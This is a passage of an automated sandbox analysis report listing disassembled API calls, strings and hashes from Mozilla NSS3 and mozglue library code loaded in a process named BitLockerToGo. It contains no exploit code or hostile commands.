                                                                                                                                                                                                                                                                                                                    • PL_ArenaRelease.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8D73
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8D8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CAB124D,00000001), ref: 6CAA8DBA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                                                    • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                                                    • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef4d4b2d997fdcef4d06756bbdb2b1db7d3bfe7367b2b70a074e9d515b4c0cfd
                                                                                                                                                                                                                                                                                                                    • Instruction ID: db6c2010631f3c9482132eaf53e4cee89de6791ad79f9f44610a021c7391b55e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4d4b2d997fdcef4d06756bbdb2b1db7d3bfe7367b2b70a074e9d515b4c0cfd
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121A1B5A046418FCB40EFB8C58466EBBF0FF45308F19896AD89887701E731D896CB91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBA0EE6
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBA0EFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA8AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA8AF0E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F16
                                                                                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F1C
                                                                                                                                                                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F25
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F2B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                                                    • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fe397c8265e30a4469baafcf9fae4670aac68fa53fc9398eb3936892bd7df468
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e2c38b9b99fcc8d319b9dcbf6573a12f9667f1fe011525f81594e0766778d72
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe397c8265e30a4469baafcf9fae4670aac68fa53fc9398eb3936892bd7df468
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B01D2B6900254BBDF01AFA4EC45CAB3F3DEF4A7A4F014024FD0A97711D676E96087A2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9B9459
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9B947D
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9B946B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64DC3
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB64DE0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CB64DD5
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CB64DDA
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB64DCB
                                                                                                                                                                                                                                                                                                                    • invalid, xrefs: 6CB64DB8
                                                                                                                                                                                                                                                                                                                    • API call with %s database connection pointer, xrefs: 6CB64DBD
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64E30
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB64E4D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CB64E42
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CB64E47
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB64E38
                                                                                                                                                                                                                                                                                                                    • invalid, xrefs: 6CB64E25
                                                                                                                                                                                                                                                                                                                    • API call with %s database connection pointer, xrefs: 6CB64E2A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?,?,00000000,?,?), ref: 6CAD0CB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?), ref: 6CAD0DC1
                                                                                                                                                                                                                                                                                                                    • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?), ref: 6CAD0DEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA92AF5,?,?,?,?,?,6CA90A1B,00000000), ref: 6CAF0F1A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: malloc.MOZGLUE(00000001), ref: 6CAF0F30
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAF0F42
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0DFF
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000), ref: 6CAD0E16
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0E53
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?,?,00000000), ref: 6CAD0E65
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0E79
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: TlsGetValue.KERNEL32(00000000,?,6CAB0844,?), ref: 6CAE157A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: EnterCriticalSection.KERNEL32(?,?,?,6CAB0844,?), ref: 6CAE158F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: PR_Unlock.NSS3(?,?,?,?,6CAB0844,?), ref: 6CAE15B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAAB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAB1397,00000000,?,6CAACF93,5B5F5EC0,00000000,?,6CAB1397,?), ref: 6CAAB1CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAAB1A0: free.MOZGLUE(5B5F5EC0,?,6CAACF93,5B5F5EC0,00000000,?,6CAB1397,?), ref: 6CAAB1D2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CAA88AE,-00000008), ref: 6CAA8A04
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: EnterCriticalSection.KERNEL32(?), ref: 6CAA8A15
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: memset.VCRUNTIME140(6CAA88AE,00000000,00000132), ref: 6CAA8A27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: PR_Unlock.NSS3(?), ref: 6CAA8A35
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1f5fa664e7110db5a581be720cfad8cd354818790847977b16871ef514823ea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 92fcc65920fea06603fa6e8529390556ab6dcefaeeee9e7f15494e84ba0a53be
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f5fa664e7110db5a581be720cfad8cd354818790847977b16871ef514823ea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D51E6B5D002515FEB009F64DD81ABF37B8EF49218F190425ED19A7702FB31FD9986A2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __allrem
                                                                                                                                                                                                                                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                                                                                                                    • API String ID: 2933888876-3221253098
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b385300507b5bb9b987adfb16c34b6c731b609b32605be97e9827dc72024e8c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 85e4661ee3128e567aa94ce918e6e4b3c4744f6c79da60748a7bf8bfe53b7a12
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b385300507b5bb9b987adfb16c34b6c731b609b32605be97e9827dc72024e8c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1761CD75B012049FDB44CF68DC94AAE7BB1FF49364F148228E9199BB80DB31AC46CB95
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CADAB3E,?,?,?), ref: 6CADAC35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CABCF16
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CADAB3E,?,?,?), ref: 6CADAC55
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CADAB3E,?,?), ref: 6CADAC70
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: TlsGetValue.KERNEL32 ref: 6CABE33C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: EnterCriticalSection.KERNEL32(?), ref: 6CABE350
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PR_Unlock.NSS3(?), ref: 6CABE5BC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CABE5CA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: TlsGetValue.KERNEL32 ref: 6CABE5F2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: EnterCriticalSection.KERNEL32(?), ref: 6CABE606
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PORT_Alloc_Util.NSS3(?), ref: 6CABE613
                                                                                                                                                                                                                                                                                                                    • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CADAC92
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CADAB3E), ref: 6CADACD7
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CADAD10
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CADAD2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: TlsGetValue.KERNEL32(00000000,?,6CADA904,?), ref: 6CABF38B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: EnterCriticalSection.KERNEL32(?,?,?,6CADA904,?), ref: 6CABF3A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: PR_Unlock.NSS3(?,?,?,?,6CADA904,?), ref: 6CABF3D3
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_Now.NSS3 ref: 6CAB8C7C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB8CB0
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAB8CD1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB8CE5
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAB8D2E
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAB8D62
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB8D93
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(?,6CAFCD93,?), ref: 6CAFCEEE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAFCD93,?), ref: 6CAFCEFC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAFCD93,?), ref: 6CAFCF0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAF08B4
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAFCD93,?), ref: 6CAFCF1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAE8D2D,?,00000000,?), ref: 6CAEFB85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAEFBB1
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF47
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF67
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(?,00000000,6CAFCD93,?,?,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF78
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B84F3
